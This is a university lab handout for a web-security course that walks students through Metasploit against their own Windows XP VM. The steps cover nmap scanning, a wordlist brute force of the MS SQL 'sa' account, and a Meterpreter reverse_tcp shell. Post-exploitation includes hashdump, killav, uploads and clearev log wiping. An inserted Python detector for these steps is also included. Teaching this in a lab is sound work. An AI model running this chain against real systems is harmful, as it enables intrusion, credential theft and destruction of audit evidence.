
Module 5: Lab Exercise

Exploiting Web Applications and Network Machines

MCY 670 Web Security

Lab Report Submission Instructions


You are required to submit a lab report, which should include comments, descriptions, and explanations of each step that you
perform. You must also include a short write-up on each segment and on the necessity of each tool that you will be exploring in
this lab task. Include screenshots of each step that you complete along with the text in your lab report.

Submission requirements: Lab report

File format: MSWord or pdf (preferred)

Report requirements

• Include your name and lab title at the top of the report.
• Number the questions and answers, and answer each question in your lab report in sequence.
• For each response, include the required text as well as all necessary and appropriate screenshots taken while performing the task.
  Crop the screenshots as necessary so that the text in the images is properly visible.
  o You may use the Snipping Tool on Windows to take screenshots from your PC by clipping the area of the virtual machine
    screen. If you are using a Mac, press and hold Shift, Command, and 4 together to enable the selection cursor for
    capturing screenshots.
• At the end of your report, write a brief reflection on the lab exercise:
  o What was the most valuable feature of the lab?
  o What did you learn from this experience?
  o Which concepts and terminology could you relate from the theoretical content to this lab experience?
  o How did you prepare for this lab?
  o What changes are you considering in preparing for your next lab?
• Use black font color for text.
• If uploading an MSWord format file, view the uploaded file from Canvas to make sure that the layout of images and text does not
  overlap in the report. If the contents seem to have moved around, upload a pdf instead of an MSWord file.

Part 1: Basics of Common MSF Commands and Finding a Specific Exploit and Target

1. Using Metasploit requires an intuitive reflex in the way the tool is used. Below are some commands which are useful for
maneuvering the Metasploit framework using msfconsole. Once you are in the msfconsole prompt, you may use the following
commands according to your necessity.
  • show (displays the list of every module in MSF)
  • show exploits (displays the exploit modules in MSF. Try to display auxiliary modules, options, payloads, targets, etc.)
  • search YOUR_SEARCH_STRING (searches MSF for matching module names)
  • use PATH_TO_MODULE (selects and loads the given module in MSF)
  • back (unloads the current module in MSF)
  • set OPTION_NAME OPTION_VALUE (sets an option, e.g. RHOST, to a value, e.g. 10.2.247.2)
  • exploit (executes the exploit that is currently loaded and configured)

2. Next, we will find a specific module, load it, and then find the possible system exploitation targets.
  • Search for the “ms08_067” netapi module
  • Use the path found, and load the module in msfconsole
  • Display the list of payloads available for the loaded module
  • Display the list of targets for the loaded module

Question:

1. What does the command “show options” or “show payloads” display when you have not selected a module, compared
to when you have a module selected?

Part 2: Using Meterpreter and Exploiting a Network Machine

Target machine: Windows VM

Note: Make sure that you use the IP address of your own WINDOWS VM as specified in the IP address document.

In this part, we will perform a sequence of steps to determine an exploitable service running on a target machine and then exploit
the machine. The actions are described in the following phases.

a) Setting up the Target VM Service

First, we will need to ensure that our target service is running properly.

1. Log in to your Windows XP VM

2. We have to ensure that our MS SQL Server is configured to receive network connections. The following instructions are for the
Windows target VM, to ensure that the MS SQL Server is configured properly.
  • MS SQL Service Manager Window
    o Browse to Start > All Programs > Microsoft SQL Server 2005 > Configuration Tools
    o Select SQL Server Configuration Manager
  • Fix IP configuration
    o Within the SQL Server Configuration Manager window
      - SQL Server 2005 Network Configuration > Protocols for SQLEXPRESS (double click)
      - TCP/IP (double click)
    o Ensure the following field contents:
      - Protocol > Listen All = No, Enabled = Yes
      - IP Addresses > IP1 > IP Address (put your Windows VM IP here)
  • Ensure that the service is running properly
    o SQL Server 2005 Services > SQL Server (SQLEXPRESS) > Right Click > Start
    o Note: If you already see it running, then stop and start it again.
    o The state of SQL Server (SQLEXPRESS) should change to Running
3. You are done setting up the Windows VM – close the window now.

b) Finding a Vulnerable Service on the Target VM

Next, we attempt to exploit our target from the Kali Linux VM.

1. Log in to your Kali Linux VM and launch msfconsole from the command line terminal
2. Scan the target machine for open ports
  • Use nmap to scan your target machine’s IP (use your Windows VM IP here)
  • Use the following arguments for nmap:
    o Scan Technique: Connect()
    o Enable OS detection, version detection, script scanning, and traceroute
    o IP Protocol Ping
  • Your command should be in the format: nmap […. arguments …] IP_OF_TARGET_VM
  • Hint 1: Use “nmap --help” to see the list of supported arguments.
  • Hint 2: Use “nmap --help | grep YOUR_SEARCH” to see filtered results
  • Examples
    o nmap --help | grep Connect (filters lines with the word Connect)
    o nmap --help | grep TCP | grep UDP (filters lines with the words TCP and UDP)
    o nmap --help | grep “Increase verbosity” (filters lines with the text Increase verbosity)
  • You are expected to browse through the list of supported arguments and find the three arguments mentioned above.
3. The next part is to identify an open port for a service which usually runs on a TCP port.
  • From the results obtained from the nmap scan, see if you have the Microsoft SQL Server running.
  • Identify and confirm the port on which the service is running (it should be running on port 1433)
4. Once confirmed, we will predict the UDP port for the target service, which is usually the next logical port on the machine.
  • In this case, we will attack the MS SQL Server running on the target VM.
  • The UDP port for the service is the next logical port (e.g., if a service is running on port 5333, the UDP port is 5334).
5. Scan that particular (predicted) UDP port for the selected service which we are going to exploit.
  • Use nmap to scan the target UDP port of the target machine
  • Use arguments for nmap for the following:
    o UDP Scan
    o Only scan specified ports
  • Your command should be in the format: nmap […. arguments …] IP_OF_TARGET_VM
  • You are expected to browse through the list of supported arguments and find the three arguments mentioned above.
  • Use Hint 1 and Hint 2 from earlier
  • The nmap scan result for the UDP scan should show that the UDP port for MS SQL is in the open state.
6. Next, we will search for and load a ping module for that service.
  • Search for and load the “mssql_ping” module in msfconsole
7. We will run the ping module to determine the details of that particular service.
  • Display the list of options for mssql_ping
  • Set RHOSTS to your Windows VM IP address
  • Set THREADS to 20
  • Execute the mssql_ping module with the exploit command (or run command)
  • Upon completion, you should be able to see the details of the MS SQL Server running on the Windows VM
8. Once the target is verified, we will search for and load a brute-force login module for that service.
  • Search for and load the “mssql_login” module in msfconsole
9. We will use a common username and a password list, and execute a brute-force login attack on that service. In our case,
we will use a popular wordlist file by Fast Track. Open a new terminal window and run the following commands:
  • sudo updatedb (updates the file-location index on your Kali machine)
  • locate fasttrack.txt (finds the location of the wordlist file on the machine)
10. Switch over to the terminal window where msfconsole is running
  • Back in the msfconsole terminal, display the list of options for mssql_login
  • Set PASS_FILE to the path_to_fasttrack_wordlist that you found earlier
  • Set USERNAME to sa (this is a common default username for system administrators on MS SQL Servers)
  • Set RHOSTS to the target VM IP address (use your Windows VM IP)
  • Set THREADS to 10
  • Set VERBOSE to false (keeping it true is also OK, but will show the results for all attempted passwords)
  • Verify the values for the options that you have set and execute the exploit
11. If successful, we will obtain the password for the common username that we used.
  • Upon completion of the mssql_login execution, you should be able to see the results with a successful
login username:password for the MS SQL server running on the Windows VM.
  • Remember/save the password that you found for the “sa” user

c) Establishing a Meterpreter Session with the Target VM

Next, we will search and load a payload to establish a Meterpreter session for use with the target machine.

1. We will use the xp_cmdshell stored procedure on MS SQL to interact with the Windows XP OS using Meterpreter
  • Search for and load the “mssql_payload” module in msfconsole
2. Display the list of options for mssql_payload
3. Look for “reverse_tcp” in the list of displayed options
  • It should be something similar to windows/meterpreter/reverse_tcp
  • Set the current payload with the path you found (set payload path_to_reverse_tcp_payload)
4. Set the connection specifications for the reverse TCP connection to the attacker’s machine (Kali VM):
  • Set LHOST to the attacker’s IP address (your Kali Linux IP)
  • Set LPORT to 4443, i.e., the port on the attacker’s machine to which the target will connect back
  • Set RHOSTS to the target VM IP address (your Windows VM IP)
  • Set RPORT to 1433, i.e., the TCP port for the MS SQL Server on the target
  • Set USERNAME to sa (this is a common default username for system administrators on MS SQL Servers)
  • Set PASSWORD to the password that you found earlier with the mssql_login exploitation.
5. Now, you’re all set for exploiting the target Windows VM using Meterpreter with a reverse TCP payload.
  • Recheck all the OPTION settings
  • Make sure that your Windows target VM is not idle (log in to the machine and keep it alive).
  • Execute the exploit
  • The exploit will try to establish the Meterpreter session with the target machine.
6. Once the exploit is launched, you will see a percentage counter from 0% to 100% for the Command Stager.
  • You may have to try a few times in case the Command Stager fails.
  • Sometimes, Windows also keeps a port busy, so you may have to restart the Windows VM and try again.
  • If you are trying multiple times, you may try to change the LPORT to some other port (e.g. 4444)
7. If you are successful, you will see the following prompt:
  • Meterpreter session 1 opened (WINDOWS_TARGET_IP -> KALI_ATTACKER_IP)
  • Your command line prompt will also now change to meterpreter >

Congratulations, you have now successfully entered the target machine remotely!

d) Post Exploitation Information Extraction

In this phase, we will try to extract information for the exploited target VM using the established Meterpreter session.

1. We will try to migrate the established Meterpreter session to a new and stable process from the initial service that we exploited
  • run post/windows/manage/migrate
    o Finds a more stable process and migrates the Meterpreter session to that process
    o Ensures the Meterpreter session does not die in case the current process is terminated on the target machine
    o Ideally, an attacker will run the migrate command at short intervals to ensure continuity of the session
2. Once the Meterpreter session is migrated, we will then run some commands on the target machine.
  • screenshot
    o Captures the current screen of the target machine
    o Displays the location on the attacker’s machine where the screenshot has been saved
    o Browse to the displayed location on your Kali Linux VM and view the screenshot
  • sysinfo
    o Displays the system information of the target machine
  • getuid
    o Retrieves the user ID under which the Meterpreter session is running on the target machine
  • ps
    o Displays the list of running processes on the target system
  • use priv
    o Loads the privileged command set (priv extension) into the Meterpreter session
  • run post/windows/gather/hashdump
    o Collects and dumps the password hashes from the target system
  • run post/windows/manage/killav
    o Kills the anti-virus process running on the target machine
  • pwd
    o Displays the current working directory
  • dir (or ls)
    o Displays the list of files in the directory
  • cd PATH_YOU_WANT_TO_MOVE_TO
    o You can use the cd command to change the directory and browse the contents
    o You can use command auto-completion to find other directories that you can browse
      - cd C:/
      - cd > hit tab to see suggestions > type the first few letters and hit tab again
    o Try to move to the student user’s Desktop directory located in
      C:\Documents and Settings\student\Desktop
  • download PATH\TO\FILE
    o This will download the given file from the target machine to the attacker’s machine
    o The output will display the location where the file is downloaded on your Kali VM
    o Log in to your Windows VM > Create a new text file test.txt on your desktop > Put in some text, save,
      and close the file. We will try to download this file from the target VM to our attacker’s machine.
      - Use the cd command to move to the student user’s Desktop directory (shown above)
      - Use the download test.txt command to download the file to your Kali VM.
      - In a separate terminal window on your Kali VM, move to the directory where the file was downloaded.
      - Run the following command to view the contents of the downloaded file: cat test.txt
      - You can also use Kali Linux’s file browser to locate and open the file.
  • upload LOCAL_FILE REMOTE_LOCATION
    o This will upload a local file from the attacker’s system to the specified location on the remote machine.
    o Create a sample text file on your Kali VM. Then, use this command to upload the file to the remote machine.
    o This is helpful if you are uploading a virus or Trojan malware to the target machine.
    o You can also change the contents of the file you downloaded earlier and upload it back.
      - On your Kali VM desktop, double-click on the Home directory
      - Open the test.txt file, modify some contents, save, and close the file.
      - Run the command upload /home/student/test.txt
      - Assuming your current working directory is the student user’s desktop, not specifying the destination
        (REMOTE_LOCATION) will copy the file to the current working directory. Therefore, the original
        test.txt file will be replaced on the desktop.
      - Log in to your Windows VM and verify the modified contents of the same file!
  • edit filename
    o You can remotely edit a file on the target machine from the attacker’s machine. The file will be opened in
      the VIM editor.
    o Assuming your current working directory is the student user’s desktop, run the command edit test.txt to
      edit the test.txt file on the student user’s desktop
    o VIM editor commands:
      - Type i to switch to insert mode
      - Hit the esc key to leave insert mode
      - Type :x! to save and exit
    o Log in to your Windows VM and verify the modified contents of the same file!
  • shell
    o This will create and open a standard command line shell on the target Windows VM
    o Type exit to switch back to the Meterpreter shell
  • clearev
    o This will delete all events on the target Windows VM from the Application, System, and Security logs.
    o Before you run the Meterpreter command, go to the Windows VM. From the start menu, right click on My
      Computer, and then click Manage. In the left column, expand Event Viewer, and click on the Application,
      Security, and System entries. Look at the contents.
    o After you have executed the clearev command from Meterpreter, open the Computer Management
      console on the Windows VM again, and see the difference!
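
A defender's view of the two noisiest steps in this lab, the mssql_login wordlist run against the sa account (Part 2b, steps 8-11) and the clearev command above: this added Python example, which is not part of the lab handout, flags a burst of failed sa logins from one client in SQL Server error-log lines and picks out the Security-log "audit log was cleared" event. The log line layouts, the EventID=... export format and all sample lines are constructed assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Failed-login line as SQL Server writes it to its ERRORLOG (also raised as
# Application event 18456). The exact layout is an assumption for this example.
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[\d.]+)\]"
)
# "The audit log was cleared": Security event 517 on Windows XP/2003, 1102 on
# Vista and later. The EventID=... export layout is an assumption.
LOG_CLEARED = re.compile(r"\bEventID=(517|1102)\b")


def detect_mssql_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, client): peak} for every account/source pair with at
    least `threshold` failed logins inside one `window` (sliding window)."""
    stamps = defaultdict(list)
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
            stamps[(m.group("user"), m.group("client"))].append(ts)
    hits = {}
    for key, times in stamps.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop events older than window
                start += 1
            if end - start + 1 >= threshold:
                hits[key] = max(hits.get(key, 0), end - start + 1)
    return hits


def detect_log_clear(lines):
    """Return the Security log lines that record the log being cleared."""
    return [line for line in lines if LOG_CLEARED.search(line)]


# Constructed sample input: six 'sa' failures from one client within 6 s
# (what a wordlist run like mssql_login produces), one stray failure from
# another client, and a Security log export that ends with a clear event.
SAMPLE_ERRORLOG = [f"2010-03-01 10:00:{s:02d}.00 Logon       Login failed for "
                   "user 'sa'. [CLIENT: 10.2.247.5]" for s in range(6)]
SAMPLE_ERRORLOG.append("2010-03-01 10:05:00.00 Logon       Login failed for "
                       "user 'sa'. [CLIENT: 10.2.247.9]")
SAMPLE_SECLOG = ["2010-03-01 10:20:00 Security EventID=528 Successful logon: student",
                 "2010-03-01 10:21:30 Security EventID=517 The audit log was cleared"]
```

On a real host the same two checks apply to the Application log (event 18456) and the Security log pulled from Event Viewer; a single source producing many sa failures in a minute, or a log-cleared event with no change ticket behind it, is the signal this lab's steps leave behind.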

Question:

2. What is “reverse TCP”? Why/How is it useful for setting up remote connections?


3. How do you think the clearev command is useful while launching an attack?
